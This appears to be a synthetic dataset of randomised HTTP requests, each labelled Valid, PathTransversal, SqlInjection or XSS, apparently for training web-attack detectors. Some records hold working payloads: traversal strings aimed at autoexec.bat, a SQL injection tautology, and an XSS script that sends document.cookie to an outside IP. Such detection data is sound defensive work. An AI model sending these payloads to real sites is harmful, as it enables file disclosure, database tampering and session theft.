If-Match: "h4JzSI9EN93fI6G58g"
If-None-Match: *
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 661
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest qop=7bjofTn
Authorization: Digest nonce
Range: 53-8432
Referer: /alkJ/esszcee/seheho/QelCsav.htm
TE: deflate;q=0.8
Trailer: Cache-Control
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 3.2; ha-tp; rv:2.8.4) Gecko/35534617
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 1.2 63.32.107.4
Transfer-Encoding: gzip
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47060
Start - Id: 24073
class: Valid
GET /emL/esy/leleuBqmnfNs/mjqmdithe/ry9/mBrTgDy0@/bnIs/em2O/aLjKaR/styleT9BYTfd6Qv6.pl? HTTP/1.0
Host: 153.161.113.14
Connection: close
Accept: audio/*, text/xml;q=0.5
Accept-Charset: iso-8859-7, us-ascii;q=0.8, iso-10646-ucs-2;q=0.8, x-mac-arabic;q=0.8
Accept-Encoding: gzip;q=0.9, gzip, compress, gzip;q=0.3, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 14.170.18.171
Cookie: nwlwtivowtrot=9331096932
Cookie2: $Version="8"
Date: Tue, 18 Apr 06 13:33:02 UTC
ETag: "d_8F95v.Kymd-y1"
Expect: 100-continue
From: ihrtss@aubcoeh.be
If-Modified-Since: Mon, 06 Apr 09 02:36:02 CET
If-Unmodified-Since: Sun, 05 Sep 04 08:51:19 CET
If-Match: "uu_Ql8UY-0LtSg3"
If-None-Match: "aAO-35peVdu3KVB"
If-Range: Wed, 28 Mar 07 08:11:57 CET
Max-Forwards: 958
MIME-Version: 8.4
Pragma: bs='ebi'
Proxy-Authorization: NTLM dWw5ZWJpbTJydHJ0dGZpSm9hdGFzdWtubW5JcU51ZWlidkptVXRkZ3V1Nk9pRQ==
Authorization: dthnh9 suegte=otgek
Range: 97098-,8076-,1747-
Referer: http://www.tciesjw.st/ehrytyr/o7ent/nlai3lft.conf
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: hiRhoboeZt (f3jzDL1scO; uCzoYZGZu; eBX2W1W8II; dng@XpvVwP)
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: HTTP/4.4 162.202.160.169, 7.5 www.sdRl.jpg
Transfer-Encoding: intmiu
Upgrade: mexkvt/9.3, jmu/8.9, itee/9.6, hik0q/1.1, fi3/2.5
Warning: 205 199.45.173.96:14 "rotui9h8te" 
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 0084225845225079837
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24073
Start - Id: 5338
class: Valid
PUT /ni/t-j_3ixV5MNrap7onG/r_VtfW-JQHxO8/sCPp4m8XTmPawMt1C/tfS0J3.php4? HTTP/1.0
Content-Length: 150
Content-Language: m,sares
Content-Encoding: identity
Content-Location: /clapq.php3
Content-MD5: bmlvQXRyY2xtZXZoNkhpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Feb 04 13:16:23 CET
Last-Modified: Sat, 09 Apr 05 14:50:41 CET
Host: 39.240.89.161
Connection: close
Accept: */*;q=0.4
Accept-Charset: big5
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 33.214.110.74
Cookie: wq2etryeq94ays=aege;UehtnfpLrd=eeogo;droeld=esdfpnsi4itsnnrydqt
Cookie2: $Version="847"
Date: Thu, 18 Nov 04 05:00:14 CET
ETag: W/"ZO1FlMmbAnlE3K6"
Expect: 100-continue
From: ozRSepFs@eAsemz.it
If-Modified-Since: Thu, 12 Jan 06 19:33:44 GMT
If-Unmodified-Since: Fri, 19 Sep 08 02:06:48 CET
If-Match: *
If-None-Match: *
If-Range: "e_Sd26igmaIZKmN"
Max-Forwards: 9
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="tcbn"
Authorization: Digest nonce
Range: 1295-20717,537637-
Referer: http://Tihor.be/yewlrnT/seDtqero.mp3
TE: gzip,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: ettryriielftEn
UA-CPU: Sparc
UA-Disp: 7479,767,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6579x971
Via: 0.7 www.dd8ehe.html:40851, 9.8 132.197.99.20
Transfer-Encoding: compress
Upgrade: ha2am/4.4, oYil/3.5, hudA/1.9, pre/2.7
Warning: 447 www.AoiT.html "ellptootAlwpn4" "Thu, 03 Mar 05 11:10:59 GMT"
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 0742335633125
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

er=wpnmimgyandhhTH>se(s&dnepraL1o=ioeaqien&ytPsI=umranh peeA-&nf7prce=aNe'Igroup byrted+&GftpMTselectiframeoGvpY=0&oisns=0Nq1Ui&xboot.iniyW=tu

End - Id: 5338
Start - Id: 115
class: Valid
GET /k.yL@V8.html?hdAhTiaRhkp2s=aesal&6oshvhiaRei=nBivyNWC_&rySrg7jaEOa8a=bjtN1tseamtpaSlp&HyPnQM1=ieyrest1n&tirss=asaprocessing-instruction&a6eg5o1epetldta=Pcat%27rqea%5BL%271nt%3Ce+r&nmns5b0knkr=0trtelnet&ordeiii=e9dRtihacbwuej&arL6cUcua=owhere&%ujko=gqbtUx39EJW2&sr=48540&q9lnaoidm=nse+union98cic&oFrhseajotrlnj=gz9aeaayiframe HTTP/1.1
Host: www.yjcpt.cz
Connection: rOet8jc
Accept: video/*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, gzip, identity;q=0.7, gzip;q=0.8
Accept-Language: zkna1h-kUn, t6pih-4ee, eetfuodi-t;q=0.2
Cache-Control: min-fresh=7
Client-ip: 218.79.205.155
Cookie: ltnoofrulenaAaa=oae;eawm1So=iT;ssazeSM=ka7m;g8Eserw7iacoy=393152073;eeabodbod=<ad t@tht'tmpao
Cookie2: $Version="879"
Date: Sat, 25 Dec 04 23:21:54 CET
ETag: W/"igEY.YYC8Usd_R.GoUz"
Expect: 100-continue
From: sMiioa@t6dn.ch
If-Modified-Since: Sat, 16 Aug 08 07:46:16 GMT
If-Unmodified-Since: Mon, 20 Apr 09 03:10:33 UTC
If-Match: "an1aM1u59Hjpz1ZZhj"
If-None-Match: *
If-Range: *
Max-Forwards: 6478
MIME-Version: 1.3
Pragma: anh=nt
Proxy-Authorization: NTLM bGRsaWRzY2VpZW5ld01yc2xkb3c1UmFUbnBlY2tWZXR2bklnOWRNRQ==
Authorization: nomk eeh948=uimis3o
Range: -84012,-01335,-234
Referer: /n0dz2U/mwhtnia/degHo4y.conf
TE: trailers,trailers,deflate;q=0.7
Trailer: Pragma
User-Agent: GT8yfodc/0.7.0.2.2
UA-CPU: MIPS
UA-Disp: 061,6482,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2972x378
Via: 6.1 200.255.217.91, FTP/6.0 www.pnebyhe.jpg, 9.8 108.54.255.226
Transfer-Encoding: compress
Upgrade: gboEt/1.0, yTh/2.4, i8pth/2.0, grs/4.8, Gwwso/1.0
Warning: 206 24.0.92.174 "aslmae6l6" 
X-Forwarded-For: 175.234.36.217
X-Serial-Number: 74970351581
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 115
Start - Id: 28596
class: Valid
GET /ndpsHTGnJMyn4vwIv/i@t.lK/gc5oVnTpNPmjD026ohOC/tWoc42anGaHNbqgH/eq9.AaWXJ/wmRo24K/tt/6iACGbOmetaAHBp/ng9aecuukhd/jcT/hywhylLs13/nE6ypn-R3l3Gc6-2m.cfm?ruzdd=t-T&eCmR1=tasmwss HTTP/1.0
Host: 83.240.9.0
Connection: myeed8
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: itoe-hoe;q=0.7
Cache-Control: no-transform
Client-ip: 146.4.145.46
Cookie: wtsrearr=095576547;g7hrwlez3auy=664722719;uR=ii5
Cookie2: $Version="23"
Date: Thu, 11 Feb 10 12:44:26 CET
ETag: "NcioNvz7YIdfPzPVN"
Expect: arlioRp
From: toIs6eah@Rhqboi.biz
If-Modified-Since: Mon, 14 Sep 09 13:24:09 GMT
If-Unmodified-Since: Sat, 18 Dec 04 08:53:49 CET
If-Match: *
If-None-Match: "b7QiHgEGmBK6QUB"
If-Range: "J.e-x0KRsbyJIA4cK"
Max-Forwards: 23
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="nteit8ao"
Authorization: ixbtei ter6aamp=aCi2eesc
Range: 014552-643
Referer: /fottwesa.cgi
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.4 (Windows; U; WinNT 2.3; po-ai; rv:3.7.1) Gecko/12223934
UA-CPU: MIPS
UA-Disp: 224,8180,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 379x210
Via: 9.9 www.rnfs.css
Transfer-Encoding: deflate
Upgrade: thto1/0.0, nre/1.4
Warning: 221 www.1et65lOl.htm:396 "oiug" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 37650652134780806
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28596
Start - Id: 36170
class: PathTransversal
GET /lCY7or.736oaDqcF1/a_rSVr/sesixmii/nfnnfz1O/ejqpoqqRN/GpDgBDBWRnNwinntP56/geono/BneeasrFosoedhP2imer/oo/uQkXeS3OcO.asp?ctaa=0560&Tdrpi=bgsound5dkem9andes&ttDnljae=htoui0rmGytp&aerlPoh9wco1doa=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&NUr0U=aai%5Ds41O%5D2t1obhttpthaving HTTP/1.0
Host: www.d1yshvr.cz
Connection: 1tiy
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity, identity;q=0.3
Accept-Language: fbma-da;q=0.9, cha-esjq;q=0.2, t-isthh, ea-5rMnohe;q=0.5
Cache-Control: no-transform
Client-ip: 164.195.241.61
Cookie: ddnqtAhtmauphpa=bt;cyoe1maddtaimr=(h/ealysdeconnect1;rek5r898d=116387;tipoxdtr=conh
Cookie2: $Version="99"
Date: Sun, 04 Mar 07 22:23:59 UTC
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: ojnuth
From: esie@ntoatbni.fr
If-Modified-Since: Mon, 06 Jul 09 19:40:40 CET
If-Unmodified-Since: Sat, 27 Dec 08 13:05:03 CET
If-Match: "EGDI1iL7va5h-td5ynew"
If-None-Match: *
If-Range: Fri, 18 Apr 08 19:03:17 UTC
Max-Forwards: 16
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 883-12,6163-,33622-
Referer: /angein/ahRybs/uh60l/o1deca.asmx
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 7.9; xa-OA; rv:9.9.6) Gecko/97280747
UA-Disp: 4206,422,32
UA-Color: color8
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 214.211.159.226
X-Serial-Number: 4255971850
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36170
Start - Id: 7998
class: Valid
POST /uHOhyerieor/owALwA0lhoVh-gGcvW/4ulye8Nqg/iktz2aw3bresgu4i/e5mnyw7i7/tSZrtZ5p15/shrLDeEb/7MDw@3dnCsXS0M/rCBE/mssln7c.php3? HTTP/1.0
Content-Length: 240
Content-Language: dlMai,atoerp,hreflse
Content-Encoding: gzip
Content-Location: /etsfne.html
Content-MD5: bnJZaVF0ZHN0ZGZjT2VoaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Aug 07 07:18:08 CET
Last-Modified: Sun, 05 Oct 08 20:10:10 CET
Host: 255.184.169.227
Connection: keep-alive
Accept: audio/*, audio/basic;q=0.4
Accept-Charset: koi8-r
Accept-Encoding: *;q=0.4
Accept-Language: edpt-8cOqReh, uh-5cEh03tn;q=0.3, lo-l;q=0.3, rtimiyyn-jht, idcyo0i-easan;q=0.9
Cache-Control: max-age=67461
Client-ip: 65.187.17.2
Cookie: iuSnSsHmu=7926;hjNspe4hte=4SS
Cookie2: $Version="792"
Date: Sun, 28 Dec 08 11:07:37 GMT
ETag: "Uor8lt.MJfvmU1Tkr"
Expect: tptnoo
From: Scez@aoailhel.gov
If-Modified-Since: Sat, 16 Dec 06 09:02:33 GMT
If-Unmodified-Since: Sun, 20 Nov 05 21:16:28 CET
If-Match: "oq_1pCLZQrw3EM4Lv"
If-None-Match: "XlYeahgjFJU5Ywo4"
If-Range: Wed, 24 Jan 07 07:26:59 UTC
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: Fs9vs 82ivtD=qasoo
Authorization: NTLM cnN1cmNyc3dzaG1hdGlsaFUyeHNlT0VuZW5ldGVhWXdPZWh0aTBvVndmNTJvYQ==
Range: 439-82,94-,67-
Referer: /eusi/kN6s/ohpitv/Iytrd/b5uketcn.jsp
TE: gzip;q=0.8,deflate;q=0.7,gzip
Trailer: Upgrade
User-Agent: Mozilla/4.8 (X11; U; Open BSD i586 1.9; id-ir; rv:2.1.2) Gecko/97525084
UA-CPU: PowerPC
UA-Disp: 6556,373,32
UA-OS: Linux
UA-Color: color16
Via: HTTP/9.5 216.100.146.194, FTP/4.4 131.225.96.188:1437, 8.1 www.seOgexno.js
Transfer-Encoding: gzip
Upgrade: htayae/6.0, UnlPs4/9.9, Xiii/1.1, rali/4.0, keeywl/8.8
Warning: 335 140.161.205.35 "oreHylenmuo4vest" 
X-Serial-Number: 6980972846
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

olj1-if7=8&e8nin2o2oidimT=uana&@scriptPlWx5J=iiMrntioo9e&idivdvefY8edrop=79208&eci=cehrhSd&man=906&rEoam3=ra/ sww betPesot dbe&2detTnare=aljysb6rlo&lnxo=e3W&r6=2i&urstoeouC2i=oa4liEiian5&0ie8t6us=25627039&hsee=rn3B.7FrHkZ&4lVdm_-orobinJ=2

End - Id: 7998
Start - Id: 35296
class: SqlInjection
GET /eaian3msrcss/emevA9pwUeAhFD_X/KinputH0FI/aXR6zkVCVzv9v1/tonet/nWXiLtM0.shtml?y49HNni7rjsdsy=%27++++OR+++%27%27+++%3D+++%27&5disIdtietoj=s+Atinsert&8gs=638642521&oer=kiasisI+&teneem8eoil=0&naEatsSx=8964 HTTP/1.1
Host: www.latse.de
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.2, euc-cn
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 213.3.132.26
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="0"
Date: Mon, 19 Jan 04 12:35:30 GMT
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Mon, 29 May 06 19:30:53 UTC
If-Unmodified-Since: Fri, 24 Nov 06 01:20:17 CET
If-Match: *
If-None-Match: "nKhvYL@HW57.tz6."
If-Range: Fri, 01 Jul 05 16:03:33 GMT
Max-Forwards: 5604
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="wwob"
Authorization: Digest response="63e449EaDA96C351aed58DC48f8d64E0"
Range: 930-456,2355-
Referer: http://www.de6h6c.de/vgfr/mteoid/Wfomldl/Eadjynen.mp3
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.7 (compatible; Konqueror/7.3; Win 9x; ttyAci; a2nNST)
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 048x605
Via: 3.3 www.eir4am.htm, 7.1 www.jkne.png:3, 8.1 135.227.95.210
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 350 4.215.62.223 "thrrt0nq8ftawYt2rl5" "Sun, 30 Nov 08 19:51:23 GMT"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35296
Start - Id: 46788
class: XSS
POST /sW4sPub/1Vfpositiongfuu5/oDideomgugceaas4B/exec.qM3oXABPl@/mgbaVD2RGJhJA/nvUE/mq_yrCJ1xJuyC0sW/eS_R-peMu9tj0SOT.swf? HTTP/1.0
Content-Length: 233
Content-Language: mi,sintna,93dus
Content-Encoding: compress
Content-Location: /gshn/olNtcaka/Suwft/eetmhe/arni.wmn
Content-MD5: aGthVHVldDVsZHNvOGR0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 17 Jul 07 08:53:25 CET
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: 17.56.1.236:80
Connection: nHe8zo
Accept: image/*, video/mpeg;q=0.6, video/quicktime;q=0.7
Accept-Charset: windows-1257;q=0.9, utf-8;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 160.46.236.124
Cookie: llincen=likeoa5z;tTedonPco=hinlhiqb4eeydg;eac=xttLteti;28selu9AttcLjt=142767511
Cookie2: $Version="91"
Date: Thu, 24 Apr 08 18:11:50 CET
ETag: W/"9ru54XN6zAHoJv82D"
Expect: 100-continue
From: fnwte@lpuewgs.de
If-Modified-Since: Fri, 24 Jun 05 16:52:30 UTC
If-Unmodified-Since: Mon, 31 Mar 08 23:58:29 GMT
If-Match: *
If-None-Match: *
If-Range: "c1Aoa7vlTOj7blNw"
Max-Forwards: 80
MIME-Version: 5.1
Pragma: iodee2i='5sh'
Proxy-Authorization: sdnda be5npAfd=Esnrrha
Authorization: NTLM aWNlanAwbWpzcGplYWl1dGU1cnRoZmhuZGVzNUVBYnJwZG5lZTZmbVRzZW5uaA==
Range: 833-
Referer: /togiO/yahbtsEb.tiff
TE: chunked;q=0.0
Trailer: If-None-Match
User-Agent: hB@Lpv http://www.4ySrod.it
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 818x5674
Via: 4.2 95.239.189.82, eneyo/9.0 181.234.52.117
Transfer-Encoding: gzip
Upgrade: uugt9t/7.7, bihs/8.6, ei8Or/1.6, cnflaa/4.8, 1yu/6.0
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 80684101
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

grcpI0YOdbnw=<xml  id   =   " X "  ><a   ><b    >&lt;script  >[window.open('http://67.72.98.249/chtoic.mdb'+document.cookie);]&lt;/script >;</b   ></a></xml>

End - Id: 46788
Start - Id: 45568
class: PathTransversal
GET /onle/Igusr0kcI/43/vnvidhANzq@/nnW_IzIR/7m6Tv7QxgpYnZWX@u6x/nrvoJidmV_ZS2Xm/rTnhcnonLoAtaw/1copy.sh?lfoenfa=aeibodyaade%7Er&eu4ItrQdert=sgK&8gn6=840&0-Bt_a-execB=93&nmSc=scxQUt8.1wx&lt0coUsa=%2Bwo&Neeneao=596728449&olxhuebtit=Nttknn7wlnA&oiJigeior=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&E6YioZexecz=8576&zBna1jvB=edrHmeteoeesd&shu17yvsiCEe=7q7qe&oniEn=59308384&vthteNdT=pnmbnodepacofn HTTP/1.0
Host: 249.211.158.126
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-7, x-mac-chinesetrad;q=0.4, x-mac-cyrillic;q=0.5, iso-10646-ucs-2;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 80.183.70.158
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="88"
Date: Wed, 25 Apr 07 16:55:44 GMT
ETag: W/"qe3rNmdfO3POj4QPG"
Expect: 7Sjsoaml
From: nnmuo@mspetgyxi.de
If-Modified-Since: Mon, 06 Aug 07 07:13:22 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "sAayVmDHjoa35QAT-"
If-None-Match: *
If-Range: "Z@A5VKN5TR3g4pnbYeNg"
Max-Forwards: 9
MIME-Version: 9.4
Pragma: bni0ia=czmr9c
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest nonce
Range: -2
Referer: /Kly8/eouoas/6bcc.cfm
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/9.6 (X11; U; Open BSD i586 9.8; ht-em; rv:0.9.4) Gecko/10185422
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 220x9820
Via: hPI/3.9 www.uem3eaht.html
Transfer-Encoding: compress
Upgrade: ggC/2.3, d2sU/5.6, shIm/3.2, ehs/6.3
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 86157391207979195
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45568
Start - Id: 25997
class: Valid
GET /nZQb/rA6ZXuuQk/it0e/itteY8Hz/axsystemJ@grcopyth/avnmnbch/lYAK0XCe0HI5z5pxv8J/Flike.shtml?neheierL=s&aeccfeii49cs=087702888&q8yEnOrvnstme=1954&skQmHtSqUtg=omrWt%25catekimg3hRupdatepwdelete&m10ttnhomel=u3Dq8iZH57&Ntj4fttueh0cec=mYP&A4tielilruslo7=oaTwii&csnglt5TT=6&nR8ct=7573089353&at=1393&gishinKrnTtt6e=340&r11eenae=atatootarrpassthrutpr HTTP/1.1
Host: www.2nuro.uk
Connection: dnslm
Accept: image/*, audio/*, image/gif;q=0.9
Accept-Charset: windows-1254, iso-2022-jp
Accept-Encoding: compress, deflate;q=0.6, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 94.246.99.0
Cookie: dwfA9RI2H68J=386;nZA0iMKm5nc=dogltblee;d7s8des=mns
Cookie2: $Version="283"
Date: Wed, 23 Jan 08 06:53:24 CET
ETag: W/"tNOlPNHZn5V6dUhMqh"
Expect: 100-continue
From: DTqDe@hek6bsSofn.biz
If-Modified-Since: Sat, 16 May 09 13:07:59 UTC
If-Unmodified-Since: Sat, 10 Apr 04 10:58:24 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 17 May 04 18:05:10 CET
Max-Forwards: 21
MIME-Version: 9.6
Pragma: p=Ii
Proxy-Authorization: NTLM MWVsYTVjY2lFcjlvc2VFc3plZmVVaGdyZWJpbGFhZXJzb25lZUVzQTRs
Authorization: Basic MjhvZTp6bmVwSUFv
Range: -22228,15-
Referer: /vmlfn/plyth.jpeg
TE: trailers,gzip;q=0.6,gzip;q=0.8
Trailer: Trailer
User-Agent: oareohffe/9.3.7.6
UA-CPU: Sparc
UA-Disp: 199,4987,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8535x949
Via: qaah/8.6 www.eeeOcee.tiff, 0.3 www.dt9entqa.tiff
Transfer-Encoding: compress
Upgrade: eeiepg/7.1, niih/8.9
Warning: 488 www.avaeexA.js:6581 "ocetwnostmfR" "Thu, 04 Oct 07 11:18:19 CET"
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 767328268470976687
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25997
Start - Id: 173
class: Valid
GET /iFB54yb5ZM_/7etcsKAs/01DJyQ_gqTDi/c@Y86y/e6TMP.shtml?mgi05ygeh=dtroe4usra+dercy&68dwUDnode0dH=tsm%3Bmoform&aaeeifHo=28755&nse4Led5csvair=nvwpiya&nitrsnia5es9=mra HTTP/1.1
Host: 169.111.158.51
Connection: limo1er
Accept: audio/*, video/*, audio/*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: hbr-ymho;q=0.2, i7wvetc-kyp, heursueE-cr, miont9d-eR, hAEaht-p;q=0.2
Cache-Control: no-transform
Client-ip: 49.228.57.192
Cookie: MmbYetkte=tupdate;AsNeo9s0dri2ept=p2l;i9oursttb2=m\
Cookie2: $Version="125"
Date: Wed, 21 Nov 07 12:27:09 GMT
ETag: "f61ret1R3hv18txQ0Z"
Expect: mer8
From: ilna2r@Raixrttrhe.st
If-Modified-Since: Sat, 22 Jan 05 11:45:52 CET
If-Unmodified-Since: Thu, 02 Jul 09 10:35:22 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Feb 06 22:49:28 GMT
Max-Forwards: 3052
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="beumpuc"
Range: -63
Referer: /lnfgmo/baitEae.asp
TE: deflate;q=0.0,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (Windows; U; Win98 0.9; Ee-w2; rv:5.7.3) Gecko/81291267
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7281x9184
Via: 8.2 242.210.5.149, sNuS2/5.0 www.aAddt4n.js
Transfer-Encoding: gzip
Upgrade: eeaeE/7.4, csse/9.1, duyebr/0.1
Warning: 367 www.lqnT2.htm "rqtcera" 
X-Forwarded-For: 7.28.176.57
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 173
Start - Id: 10132
class: Valid
GET /dxihus/lJC@J66C/of95shclEbrntdwo/atwlita/eo7d/ilNB6mduaJb7n8L.png?tn8g=c5e5Csohwopo&ehgcr=6lok&tLesexv=8941457&Cawig9nyujAoe=yoZM-E0k0KZ.&xeudyegr=+3jge&ukaas4=ntnNie6jALa&RIuEp=rmx HTTP/1.0
Host: www.aeEneecc.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 42.207.99.95
Cookie: tiaiwXeehYnhaCh=e
Cookie2: $Version="9"
Date: Mon, 22 Sep 08 16:29:49 UTC
ETag: W/"ZNPeIbuyDuWoq.Gflf"
Expect: jpgrt=9vdtd;nsh5uen=mOEto
From: tooao@trne6cted.it
If-Modified-Since: Mon, 26 Mar 07 21:42:04 GMT
If-Unmodified-Since: Tue, 23 Dec 08 14:16:35 CET
If-Match: *
If-None-Match: "vdxNEsMSfJfyUJKC"
If-Range: *
Max-Forwards: 94
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: NTLM U3JyY3JhZXRkMHd4YWFlbm45bkVpRTVuM281cmhzMmVzWm4=
Range: 374825-,-184
Referer: /fnalnCa/t8eAtd.html
TE: trailers
Trailer: Pragma
User-Agent: eDoCYxhKJd http://www.tubnA.fr
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 012x3228
Via: HTTP/5.6 www.bsneeq.shtml, 6.4 225.34.210.184
Transfer-Encoding: ntaneU; yrrsnipt=aornsrd
Upgrade: oameu/8.0, bsste/1.0
Warning: 532 www.shkroer.shtml:1701 "enin" "Sat, 30 Apr 05 12:33:33 UTC"
X-Forwarded-For: 175.87.104.128
X-Serial-Number: 42090054187399989
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10132
Start - Id: 28535
class: Valid
GET /boot.inilsFNpWd/y5jI/nsXW0lV/bI_UliboXvrPy-1HE/nTraiYrtenea/ag33LMj5rm76YmM/steehtut69cmut/kaRIhWXy_Kh.php3?6llipbOoelrm=837&cdc=4kh&snAdUloPpsmdf=t%3Eypo&HlikejhcGwT-=su&slagttelpbtuyoe=n%294jefqcbnYtu&reb=+BNupdatepassthru&jldWvarOSR=+ss HTTP/1.0
Host: 96.50.186.120
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-1;q=0.1, big5;q=0.7, iso-8859-2, cp-950
Accept-Encoding: 
Accept-Language: e5vstoia-fioset5M;q=0.5, eal-soa;q=0.5, gpg6se-nortf, u0bit-sdaztem
Cache-Control: only-if-cached
Client-ip: 8.219.184.213
Cookie: t6y=pq cds;5nn8unita5naw=adit
Cookie2: $Version="3"
Date: Wed, 16 Mar 05 07:15:05 GMT
ETag: "8DVUS.kNUOfqcr9H"
Expect: 100-continue
From: tuezrt@nexhlht5a.it
If-Modified-Since: Wed, 23 Jan 08 05:15:34 CET
